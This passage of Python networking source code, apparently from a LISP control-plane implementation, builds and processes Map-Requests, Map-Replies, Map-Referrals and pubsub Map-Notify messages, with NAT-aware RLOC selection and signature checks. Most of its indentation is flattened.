lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_rtr_process_map_request(lisp_sockets, map_request, source, port,
ttl, timestamp)
return
#endif
lprint("Ignoring received {} Map-Request, not an ETR or RTR".format(p))
return
#enddef
#
# lisp_process_smr
#
def lisp_process_smr(map_request):
lprint("Received SMR-based Map-Request")
return
#enddef
#
# lisp_process_smr_invoked_request
#
def lisp_process_smr_invoked_request(map_request):
lprint("Received SMR-invoked Map-Request")
return
#enddef
#
# lisp_build_map_reply
#
# Build a Map-Reply and return a packet to the caller.
#
def lisp_build_map_reply(eid, group, rloc_set, nonce, action, ttl, map_request,
keys, enc, auth, mr_ttl=-1):
rloc_probe = map_request.rloc_probe if (map_request != None) else False
json_telemetry = map_request.json_telemetry if (map_request != None) else \
None
map_reply = lisp_map_reply()
map_reply.rloc_probe = rloc_probe
map_reply.echo_nonce_capable = enc
map_reply.hop_count = 0 if (mr_ttl == -1) else mr_ttl
map_reply.record_count = 1
map_reply.nonce = nonce
packet = map_reply.encode()
map_reply.print_map_reply()
eid_record = lisp_eid_record()
eid_record.rloc_count = len(rloc_set)
if (json_telemetry != None): eid_record.rloc_count += 1
eid_record.authoritative = auth
eid_record.record_ttl = ttl
eid_record.action = action
eid_record.eid = eid
eid_record.group = group
packet += eid_record.encode()
eid_record.print_record(" ", False)
local_rlocs = lisp_get_all_addresses() + lisp_get_all_translated_rlocs()
probing_rloc = None
for rloc_entry in rloc_set:
multicast = rloc_entry.rloc.is_multicast_address()
rloc_record = lisp_rloc_record()
probe_bit = rloc_probe and (multicast or json_telemetry == None)
addr_str = rloc_entry.rloc.print_address_no_iid()
if (addr_str in local_rlocs or multicast):
rloc_record.local_bit = True
rloc_record.probe_bit = probe_bit
rloc_record.keys = keys
if (rloc_entry.priority == 254 and lisp_i_am_rtr):
rloc_record.rloc_name = "RTR"
#endif
if (probing_rloc == None):
if (rloc_entry.translated_rloc.is_null()):
probing_rloc = rloc_entry.rloc
else:
probing_rloc = rloc_entry.translated_rloc
#endif
#endif
#endif
rloc_record.store_rloc_entry(rloc_entry)
rloc_record.reach_bit = True
rloc_record.print_record(" ")
packet += rloc_record.encode()
#endfor
#
# Add etr-out-ts if telemetry data was present in Map-Request.
#
if (json_telemetry != None):
rloc_record = lisp_rloc_record()
if (probing_rloc): rloc_record.rloc.copy_address(probing_rloc)
rloc_record.local_bit = True
rloc_record.probe_bit = True
rloc_record.reach_bit = True
if (lisp_i_am_rtr):
rloc_record.priority = 254
rloc_record.rloc_name = "RTR"
#endif
js = lisp_encode_telemetry(json_telemetry, eo=str(time.time()))
rloc_record.json = lisp_json("telemetry", js)
rloc_record.print_record(" ")
packet += rloc_record.encode()
#endif
return(packet)
#enddef
#
# lisp_build_map_referral
#
# Build a Map-Referral and return a packet to the caller.
#
def lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce):
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
eid_record = lisp_eid_record()
rloc_count = 0
if (ddt_entry == None):
eid_record.eid = eid
eid_record.group = group
else:
rloc_count = len(ddt_entry.delegation_set)
eid_record.eid = ddt_entry.eid
eid_record.group = ddt_entry.group
ddt_entry.map_referrals_sent += 1
#endif
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
#
# Use action passed into this function. But if NULL, select the action
# based on the first ddt-node child type.
#
incomplete = False
if (action == LISP_DDT_ACTION_NULL):
if (rloc_count == 0):
action = LISP_DDT_ACTION_NODE_REFERRAL
else:
ddt_node = ddt_entry.delegation_set[0]
if (ddt_node.is_ddt_child()):
action = LISP_DDT_ACTION_NODE_REFERRAL
#endif
if (ddt_node.is_ms_child()):
action = LISP_DDT_ACTION_MS_REFERRAL
#endif
#endif
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (lisp_i_am_ms and ddt_node.is_ms_peer() == False)
#endif
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
if (rloc_count == 0): return(packet)
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
return(packet)
#enddef
#
# lisp_etr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_etr_process_map_request(lisp_sockets, map_request, source, sport,
ttl, etr_in_ts):
if (map_request.target_group.is_null()):
db = lisp_db_for_lookups.lookup_cache(map_request.target_eid, False)
else:
db = lisp_db_for_lookups.lookup_cache(map_request.target_group, False)
if (db): db = db.lookup_source_cache(map_request.target_eid, False)
#endif
eid_str = map_request.print_prefix()
if (db == None):
lprint("Database-mapping entry not found for requested EID {}". \
format(green(eid_str, False)))
return
#endif
prefix_str = db.print_eid_tuple()
lprint("Found database-mapping EID-prefix {} for requested EID {}". \
format(green(prefix_str, False), green(eid_str, False)))
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address() and lisp_nat_traversal):
itr_rloc = source
#endif
nonce = map_request.nonce
enc = lisp_nonce_echoing
keys = map_request.keys
#
# If we found telemetry data in the Map-Request, add the input timestamp
# now and add output timestamp when building the Map-Reply.
#
jt = map_request.json_telemetry
if (jt != None):
map_request.json_telemetry = lisp_encode_telemetry(jt, ei=etr_in_ts)
#endif
db.map_replies_sent += 1
packet = lisp_build_map_reply(db.eid, db.group, db.rloc_set, nonce,
LISP_NO_ACTION, 1440, map_request, keys, enc, True, ttl)
#
# If we are sending a RLOC-probe Map-Reply to an RTR, data encapsulate it.
# If we are getting RLOC-probe Map-Requests from an xTR behind a NAT, and
# we are an ETR not behind a NAT, we want to return the RLOC-probe Map-Reply
# to the swapped control ports.
#
# We could be getting a RLOC-probe from an xTR that is behind the same
# NAT as us. So do not data encapsulate the RLOC-probe reply.
#
# There is a special hack here. If the sport is 0, this RLOC-probe
# request is coming from an RTR. If we are doing gleaning on the RTR,
# this xTR needs to data encapsulate the RLOC-probe reply. The lisp_rtr_
# list will not be set because a gleaned xTR does not have NAT-traversal
# enabled.
#
if (map_request.rloc_probe and len(lisp_sockets) == 4):
public = (itr_rloc.is_private_address() == False)
rtr = itr_rloc.print_address_no_iid()
if (public and rtr in lisp_rtr_list or sport == 0):
lisp_encapsulate_rloc_probe(lisp_sockets, itr_rloc, None, packet)
return
#endif
#endif
#
# Send to lisp-core process to send packet from UDP port 4342.
#
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_rtr_process_map_request
#
# Do RTR processing of a Map-Request.
#
def lisp_rtr_process_map_request(lisp_sockets, map_request, source, sport,
ttl, etr_in_ts):
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address()): itr_rloc = source
nonce = map_request.nonce
eid = map_request.target_eid
group = map_request.target_group
rloc_set = []
for myrloc in [lisp_myrlocs[0], lisp_myrlocs[1]]:
if (myrloc == None): continue
rloc = lisp_rloc()
rloc.rloc.copy_address(myrloc)
rloc.priority = 254
rloc_set.append(rloc)
#endfor
enc = lisp_nonce_echoing
keys = map_request.keys
#
# If we found telemetry data in the Map-Request, add the input timestamp
# now and add output timestamp in building the Map-Reply.
#
jt = map_request.json_telemetry
if (jt != None):
map_request.json_telemetry = lisp_encode_telemetry(jt, ei=etr_in_ts)
#endif
packet = lisp_build_map_reply(eid, group, rloc_set, nonce, LISP_NO_ACTION,
1440, map_request, keys, enc, True, ttl)
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_get_private_rloc_set
#
# If the source-EID and target-EID of a Map-Request are behind the same NAT,
# that is, have the same global RLOC address, then return just the private
# addresses in the Map-Reply so the xTRs have the shortest RLOC paths between
# each other and don't have to hair-pin through the NAT/firewall device.
#
def lisp_get_private_rloc_set(target_site_eid, seid, group):
rloc_set = target_site_eid.registered_rlocs
source_site_eid = lisp_site_eid_lookup(seid, group, False)
if (source_site_eid == None): return(rloc_set)
#
# Get global RLOC address from target site.
#
target_rloc = None
new_set = []
for rloc_entry in rloc_set:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()):
new_rloc = copy.deepcopy(rloc_entry)
new_set.append(new_rloc)
continue
#endif
target_rloc = rloc_entry
break
#endfor
if (target_rloc == None): return(rloc_set)
target_rloc = target_rloc.rloc.print_address_no_iid()
#
# Get global RLOC address from source site.
#
source_rloc = None
for rloc_entry in source_site_eid.registered_rlocs:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()): continue
source_rloc = rloc_entry
break
#endfor
if (source_rloc == None): return(rloc_set)
source_rloc = source_rloc.rloc.print_address_no_iid()
#
# If the xTRs are behind the same NAT, then we return private addresses.
#
site_id = target_site_eid.site_id
if (site_id == 0):
if (source_rloc == target_rloc):
lprint("Return private RLOCs for sites behind {}".format( \
target_rloc))
return(new_set)
#endif
return(rloc_set)
#endif
#
# If the xTRs are not behind the same NAT, but are configured in the
# same site-id, they can reach each other with private addresses. So
# return them in the RLOC-set.
#
if (site_id == source_site_eid.site_id):
lprint("Return private RLOCs for sites in site-id {}".format(site_id))
return(new_set)
#endif
return(rloc_set)
#enddef
#
# lisp_get_partial_rloc_set
#
# If the Map-Request source is found in the RLOC-set, return all RLOCs that
# do not have the same priority as the Map-Request source (an RTR supporting
# NAT-traversal) RLOC. Otherwise, return all RLOCs that are not priority 254.
#
def lisp_get_partial_rloc_set(registered_rloc_set, mr_source, multicast):
rtr_list = []
rloc_set = []
#
# Search the RTR list to see if the Map-Requestor is an RTR. If so,
# return the RLOC-set to the RTR so it can replicate directly to ETRs.
# Otherwise, return the RTR-list locator-set to the requesting ITR/PITR.
#
rtr_is_requestor = False
behind_nat = False
for rloc_entry in registered_rloc_set:
if (rloc_entry.priority != 254): continue
behind_nat |= True
if (rloc_entry.rloc.is_exact_match(mr_source) == False): continue
rtr_is_requestor = True
break
#endfor
#
# If we find an RTR in the RLOC-set, then the site's RLOC-set is behind
# a NAT. Otherwise, do not return a partial RLOC-set. This RLOC-set is in
# public space.
#
if (behind_nat == False): return(registered_rloc_set)
#
# An RTR can be behind a NAT when deployed in a cloud infrastructure.
# When the MS is in the same cloud infrastructure, the source address
# of the Map-Request (ECM) is not translated. So we are forced to put
# the private address in the rtr-list the MS advertises. But we should
# not return the private address in any Map-Replies. We use the private
# address in the rtr-list for the sole purpose of identifying the RTR so
# we can return the RLOC-set of the ETRs.
#
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
#
# Create two small lists. A list of RTRs which are unicast priority of
# 254 and a rloc-set which are records that are not priority 254.
#
for rloc_entry in registered_rloc_set:
if (ignore_private and rloc_entry.rloc.is_private_address()): continue
if (multicast == False and rloc_entry.priority == 255): continue
if (multicast and rloc_entry.mpriority == 255): continue
if (rloc_entry.priority == 254):
rtr_list.append(rloc_entry)
else:
rloc_set.append(rloc_entry)
#endif
#endif
#
# The RTR is sending the Map-Request.
#
if (rtr_is_requestor): return(rloc_set)
#
# An ITR is sending the Map-Request.
#
# Check the case where an ETR included a local RLOC and may be behind
# the same NAT as the requester. In this case, the requester can encap
# directly to the private RLOC. If it is not reachable, the ITR can encap
# to the RTR. The ITR will cache a subset of the RLOC-set in this entry
# (so it can check the global RLOC first and not encap to itself).
#
# This can also be true for IPv6 RLOCs. So include them.
#
rloc_set = []
for rloc_entry in registered_rloc_set:
if (rloc_entry.rloc.is_ipv6()): rloc_set.append(rloc_entry)
if (rloc_entry.rloc.is_private_address()): rloc_set.append(rloc_entry)
#endfor
rloc_set += rtr_list
return(rloc_set)
#enddef
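#
# Illustrative note for the partial RLOC-set logic above (hypothetical
# registered set): if a site registered one ETR RLOC at priority 1 and one
# RTR RLOC at priority 254, an RTR requestor gets back just the ETR RLOC so
# it can replicate/encapsulate directly, while an ITR/PITR requestor gets
# back the ETR's private and IPv6 RLOCs (if any) plus the RTR RLOC.
#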
#
# lisp_store_pubsub_state
#
# Take information from Map-Request to create a pubsub cache. We remember
# the map-server lookup EID-prefix. So when the RLOC-set changes for this
# EID-prefix, we trigger a Map-Notify message to the ITR's RLOC and port
# number.
#
def lisp_store_pubsub_state(reply_eid, itr_rloc, mr_sport, nonce, ttl, xtr_id):
pubsub = lisp_pubsub(itr_rloc, mr_sport, nonce, ttl, xtr_id)
pubsub.add(reply_eid)
return(pubsub)
#enddef
#
# lisp_convert_reply_to_notify
#
# In lisp_ms_process_map_request(), a proxy Map-Reply is built to return to
# a requesting ITR. If the requesting ITR set the N-bit in the Map-Request,
# a subscription is being requested, so return a Map-Notify so the ITR knows
# it has been acked.
#
# This function takes a fully built Map-Reply, changes the first 4 bytes to
# make the message a Map-Notify and inserts 4-bytes of Key-ID, Alg-ID, and
# Authentication Length of 0. Then we have converted the Map-Reply into a
# Map-Notify.
#
def lisp_convert_reply_to_notify(packet):
#
# Get data we need from Map-Reply for Map-Notify.
#
record_count = struct.unpack("I", packet[0:4])[0]
record_count = socket.ntohl(record_count) & 0xff
nonce = packet[4:12]
packet = packet[12::]
#
# Build Map-Notify header.
#
first_long = (LISP_MAP_NOTIFY << 28) | record_count
header = struct.pack("I", socket.htonl(first_long))
auth = struct.pack("I", 0)
#
# Concat fields of Map-Notify.
#
packet = header + nonce + auth + packet
return(packet)
#enddef
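#
# Illustrative sketch (hypothetical helper, never called): pulling the type
# and record count back out of the first longword written above, the inverse
# of the header rewrite done by lisp_convert_reply_to_notify().
#
def _example_notify_type_and_count(packet):
    first_long = socket.ntohl(struct.unpack("I", packet[0:4])[0])
    return([first_long >> 28, first_long & 0xff])
#enddef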
#
# lisp_notify_subscribers
#
# There has been an RLOC-set change, inform all subscribers who have subscribed
# to this EID-prefix.
#
def lisp_notify_subscribers(lisp_sockets, eid_record, rloc_records,
registered_eid, site):
for peid in lisp_pubsub_cache:
for pubsub in list(lisp_pubsub_cache[peid].values()):
e = pubsub.eid_prefix
if (e.is_more_specific(registered_eid) == False): continue
itr = pubsub.itr
port = pubsub.port
itr_str = red(itr.print_address_no_iid(), False)
sub_str = bold("subscriber", False)
xtr_id = "0x" + lisp_hex_string(pubsub.xtr_id)
nonce = "0x" + lisp_hex_string(pubsub.nonce)
lprint(" Notify {} {}:{} xtr-id {} for {}, nonce {}".format( \
sub_str, itr_str, port, xtr_id, green(peid, False), nonce))
#
# Do not use memory from EID-record of Map-Register since we are
# over-writing EID for Map-Notify message.
#
pubsub_record = copy.deepcopy(eid_record)
pubsub_record.eid.copy_address(e)
pubsub_record = pubsub_record.encode() + rloc_records
lisp_build_map_notify(lisp_sockets, pubsub_record, [peid], 1, itr,
port, pubsub.nonce, 0, 0, 0, site, False)
pubsub.map_notify_count += 1
#endfor
#endfor
return
#enddef
#
# lisp_process_pubsub
#
# Take a fully built Map-Reply and send a Map-Notify as a pubsub ack.
#
def lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc, port, nonce,
ttl, xtr_id):
#
# Store subscriber state.
#
pubsub = lisp_store_pubsub_state(reply_eid, itr_rloc, port, nonce, ttl,
xtr_id)
eid = green(reply_eid.print_prefix(), False)
itr = red(itr_rloc.print_address_no_iid(), False)
mn = bold("Map-Notify", False)
xtr_id = "0x" + lisp_hex_string(xtr_id)
lprint("{} pubsub request for {} to ack ITR {} xtr-id: {}".format(mn,
eid, itr, xtr_id))
#
# Convert Map-Reply to Map-Notify header and send out.
#
packet = lisp_convert_reply_to_notify(packet)
lisp_send_map_notify(lisp_sockets, packet, itr_rloc, port)
pubsub.map_notify_count += 1
return
#enddef
#
# lisp_ms_process_map_request
#
# Do Map-Server processing of a Map-Request. Returns various LISP-DDT internal
# and external action values.
#
def lisp_ms_process_map_request(lisp_sockets, packet, map_request, mr_source,
mr_sport, ecm_source):
#
# Look up EID in site cache. If we find it and it has registered for
# proxy-replying, this map-server will send the Map-Reply. Otherwise,
# send to one of the ETRs at the registered site.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
itr_rloc = map_request.itr_rlocs[0]
xtr_id = map_request.xtr_id
nonce = map_request.nonce
action = LISP_NO_ACTION
pubsub = map_request.subscribe_bit
#
# Check if we are verifying Map-Request signatures. If so, do a mapping
# database lookup on the source-EID to get public-key.
#
sig_good = True
is_crypto_hash = (lisp_get_eid_hash(eid) != None)
if (is_crypto_hash):
sig = map_request.map_request_signature
if (sig == None):
sig_good = False
lprint(("EID-crypto-hash signature verification {}, " + \
"no signature found").format(bold("failed", False)))
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("EID-crypto-hash signature verification {}".format(pf))
#endif
#endif
if (pubsub and sig_good == False):
pubsub = False
lprint("Suppress creating pubsub state due to signature failure")
#endif
#
# There are two cases here that need attention. If the Map-Request was
# an IPv6 Map-Request but the ECM came to us in a IPv4 packet, we need
# to return the Map-Reply in IPv4. And if the Map-Request came to us
# through a NAT, sending the Map-Reply to the Map-Request port won't
# get translated by the NAT. So we have to return the Map-Reply to the
# ECM port. Hopefully, the RTR is listening on the ECM port and using
# the Map-Request port as the ECM port as well. This is typically only
# a problem on the RTR, when behind a NAT. For an ITR, it usually
# doesn't send Map-Requests since NAT-traversal logic installs default
# map-cache entries.
#
reply_dest = itr_rloc if (itr_rloc.afi == ecm_source.afi) else ecm_source
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None or site_eid.is_star_g()):
notfound = bold("Site not found", False)
lprint("{} for requested EID {}".format(notfound,
green(eid_str, False)))
#
# Send negative Map-Reply with TTL 15 minutes.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, 15, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_SITE_NOT_FOUND])
#endif
prefix_str = site_eid.print_eid_tuple()
site_name = site_eid.site.site_name
#
# If the request is for a non-crypto-EID, signatures are configured to be
# required, and no signature is in the Map-Request, bail.
#
if (is_crypto_hash == False and site_eid.require_signature):
sig = map_request.map_request_signature
sig_eid = map_request.signature_eid
if (sig == None or sig_eid.is_null()):
lprint("Signature required for site {}".format(site_name))
sig_good = False
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("Required signature verification {}".format(pf))
#endif
#endif
#
# Check if site-eid is registered.
#
if (sig_good and site_eid.registered == False):
lprint("Site '{}' with EID-prefix {} is not registered for EID {}". \
format(site_name, green(prefix_str, False), green(eid_str, False)))
#
# We do not want to return a coarser EID-prefix to the Map-Resolver. The
# AMS (accept-more-specifics) site entry may be one.
#
if (site_eid.accept_more_specifics == False):
eid = site_eid.eid
group = site_eid.group
#endif
#
# Send forced-TTLs even for native-forward entries.
#
ttl = 1
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Send negative Map-Reply with TTL 1 minute.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, ttl, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_MS_NOT_REG])
#endif
#
# Should we proxy-reply?
#
nat = False
pr_str = ""
check_policy = False
if (site_eid.force_nat_proxy_reply):
pr_str = ", nat-forced"
nat = True
check_policy = True
elif (site_eid.force_proxy_reply):
pr_str = ", forced"
check_policy = True
elif (site_eid.proxy_reply_requested):
pr_str = ", requested"
check_policy = True
elif (map_request.pitr_bit and site_eid.pitr_proxy_reply_drop):
pr_str = ", drop-to-pitr"
action = LISP_DROP_ACTION
elif (site_eid.proxy_reply_action != ""):
action = site_eid.proxy_reply_action
pr_str = ", forced, action {}".format(action)
action = LISP_DROP_ACTION if (action == "drop") else \
LISP_NATIVE_FORWARD_ACTION
#endif
#
# Apply policy to determine if we send a negative map-reply with action
# "policy-denied" or we send a map-reply with the policy set parameters.
#
policy_drop = False
policy = None
if (check_policy and site_eid.policy in lisp_policies):
p = lisp_policies[site_eid.policy]
if (p.match_policy_map_request(map_request, mr_source)): policy = p
if (policy):
ps = bold("matched", False)
lprint("Map-Request {} policy '{}', set-action '{}'".format(ps,
p.policy_name, p.set_action))
else:
ps = bold("no match", False)
lprint("Map-Request {} for policy '{}', implied drop".format(ps,
p.policy_name))
policy_drop = True
#endif
#endif
if (pr_str != ""):
lprint("Proxy-replying for EID {}, found site '{}' EID-prefix {}{}". \
format(green(eid_str, False), site_name, green(prefix_str, False),
pr_str))
rloc_set = site_eid.registered_rlocs
ttl = 1440
if (nat):
if (site_eid.site_id != 0):
seid = map_request.source_eid
rloc_set = lisp_get_private_rloc_set(site_eid, seid, group)
#endif
if (rloc_set == site_eid.registered_rlocs):
m = (site_eid.group.is_null() == False)
new_set = lisp_get_partial_rloc_set(rloc_set, reply_dest, m)
if (new_set != rloc_set):
ttl = 15
rloc_set = new_set
#endif
#endif
#endif
#
# Force TTL if configured. To denote seconds in TTL field of EID-record
# set high-order bit in ttl value.
#
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Does policy say what the ttl should be? And whether we should drop the
# Map-Request and return a negative Map-Reply.
#
if (policy):
if (policy.set_record_ttl):
ttl = policy.set_record_ttl
lprint("Policy set-record-ttl to {}".format(ttl))
#endif
if (policy.set_action == "drop"):
lprint("Policy set-action drop, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
else:
rloc = policy.set_policy_map_reply()
if (rloc): rloc_set = [rloc]
#endif
#endif
if (policy_drop):
lprint("Implied drop action, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
#endif
enc = site_eid.echo_nonce_capable
#
# Don't tell spoofer any prefix information about the target EID.
#
if (sig_good):
reply_eid = site_eid.eid
reply_group = site_eid.group
else:
reply_eid = eid
reply_group = group
action = LISP_AUTH_FAILURE_ACTION
rloc_set = []
#endif
#
# When replying to a subscribe-request, return the target EID and not the
# possibly shorter matching EID-prefix that was registered.
#
if (pubsub):
reply_eid = eid
reply_group = group
#endif
#
# If this Map-Request is also a subscription request, return same
# information in a Map-Notify.
#
packet = lisp_build_map_reply(reply_eid, reply_group, rloc_set,
nonce, action, ttl, map_request, None, enc, False)
if (pubsub):
lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc,
mr_sport, nonce, ttl, xtr_id)
else:
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, mr_sport)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# If there are no registered RLOCs, return.
#
rloc_count = len(site_eid.registered_rlocs)
if (rloc_count == 0):
lprint(("Requested EID {} found site '{}' with EID-prefix {} with " + \
"no registered RLOCs").format(green(eid_str, False), site_name,
green(prefix_str, False)))
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# Forward to ETR at registered site. We have to put in an ECM.
#
hash_address = map_request.target_eid if map_request.source_eid.is_null() \
else map_request.source_eid
hashval = map_request.target_eid.hash_address(hash_address)
hashval %= rloc_count
etr = site_eid.registered_rlocs[hashval]
if (etr.rloc.is_null()):
lprint(("Suppress forwarding Map-Request for EID {} at site '{}' " + \
"EID-prefix {}, no RLOC address").format(green(eid_str, False),
site_name, green(prefix_str, False)))
else:
lprint(("Forwarding Map-Request for EID {} to ETR {} at site '{}' " + \
"EID-prefix {}").format(green(eid_str, False),
red(etr.rloc.print_address(), False), site_name,
green(prefix_str, False)))
#
# Send ECM.
#
lisp_send_ecm(lisp_sockets, packet, map_request.source_eid, mr_sport,
map_request.target_eid, etr.rloc, to_etr=True)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#enddef
#
# lisp_ddt_process_map_request
#
# Do DDT-node processing of a Map-Request received from an Map-Resolver.
#
def lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source, port):
#
# Lookup target EID address in DDT cache.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
nonce = map_request.nonce
action = LISP_DDT_ACTION_NULL
#
# First check to see if EID is registered locally if we are a Map-Server.
# Otherwise, do DDT lookup.
#
ddt_entry = None
if (lisp_i_am_ms):
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None): return
if (site_eid.registered):
action = LISP_DDT_ACTION_MS_ACK
ttl = 1440
else:
eid, group, action = lisp_ms_compute_neg_prefix(eid, group)
action = LISP_DDT_ACTION_MS_NOT_REG
ttl = 1
#endif
else:
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry == None):
action = LISP_DDT_ACTION_NOT_AUTH
ttl = 0
lprint("DDT delegation entry not found for EID {}".format( \
green(eid_str, False)))
elif (ddt_entry.is_auth_prefix()):
#
# Check auth-prefix. That means there are no referrals.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE
ttl = 15
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint(("DDT delegation entry not found but auth-prefix {} " + \
"found for EID {}").format(ddt_entry_str,
green(eid_str, False)))
if (group.is_null()):
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
lisp_ddt_cache)
else:
group = lisp_ddt_compute_neg_prefix(group, ddt_entry,
lisp_ddt_cache)
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
ddt_entry.source_cache)
#endif
ddt_entry = None
else:
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint("DDT delegation entry {} found for EID {}".format( \
ddt_entry_str, green(eid_str, False)))
ttl = 1440
#endif
#endif
#
# Build and return a Map-Referral message to the source of the Map-Request.
#
packet = lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce)
nonce = map_request.nonce >> 32
if (map_request.nonce != 0 and nonce != 0xdfdf0e1d): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_find_negative_mask_len
#
# XOR the two addresses so we can find the first bit that is different. Then
# count the number of bits from the left that bit position is. That is the
# new mask-length. Compare to the neg-prefix mask-length we have found so
# far. If the new one is longer than the stored one so far, replace it.
#
# This function assumes the address size and the address-family are the same
# for 'eid' and 'entry_prefix'. Caller must make sure of that.
#
def lisp_find_negative_mask_len(eid, entry_prefix, neg_prefix):
diff_address = eid.hash_address(entry_prefix)
address_size = eid.addr_length() * 8
mask_len = 0
#
# The first set bit is the one that is different.
#
for mask_len in range(address_size):
bit_test = 1 << (address_size - mask_len - 1)
if (diff_address & bit_test): break
#endfor
if (mask_len > neg_prefix.mask_len): neg_prefix.mask_len = mask_len
return
#enddef
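#
# Worked example (hypothetical addresses), assuming hash_address() is the
# XOR described above: for eid 10.1.1.1 and entry_prefix 10.1.0.0 the XOR
# is 0x00000101, whose first set bit from the left is bit position 23, so
# this call leaves a mask-length of 23 in neg_prefix if that is longer than
# what was already stored there.
#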
#
# lisp_neg_prefix_walk
#
# Callback routine to decide which prefixes should be considered by function
# lisp_find_negative_mask_len().
#
# 'entry' in this routine could be a lisp_ddt_entry() or a lisp_site_eid().
#
def lisp_neg_prefix_walk(entry, parms):
eid, auth_prefix, neg_prefix = parms
if (auth_prefix == None):
if (entry.eid.instance_id != eid.instance_id):
return([True, parms])
#endif
if (entry.eid.afi != eid.afi): return([True, parms])
else:
if (entry.eid.is_more_specific(auth_prefix) == False):
return([True, parms])
#endif
#endif
#
# Find bits that match.
#
lisp_find_negative_mask_len(eid, entry.eid, neg_prefix)
return([True, parms])
#enddef
#
# lisp_ddt_compute_neg_prefix
#
# Walk the DDT cache to compute the least specific prefix within the auth-
# prefix found.
#
def lisp_ddt_compute_neg_prefix(eid, ddt_entry, cache):
#
# Do not compute negative prefixes for distinguished-names or geo-prefixes.
#
if (eid.is_binary() == False): return(eid)
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
auth_prefix_str = ddt_entry.print_eid_tuple()
auth_prefix = ddt_entry.eid
#
# Walk looking for the shortest prefix that does NOT match any site EIDs
# configured.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from ddt-cache for EID {} " + \
"using auth-prefix {} is {}").format(green(eid.print_address(), False),
auth_prefix_str, neg_prefix.print_prefix()))
return(neg_prefix)
#enddef
#
# lisp_ms_compute_neg_prefix
#
# From the site cache and the DDT cache, compute a negative EID-prefix to not
# be shorter than a configured authoritative-prefix.
#
def lisp_ms_compute_neg_prefix(eid, group):
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
gneg_prefix = lisp_address(group.afi, "", 0, 0)
gneg_prefix.copy_address(group)
gneg_prefix.mask_len = 0
auth_prefix = None
#
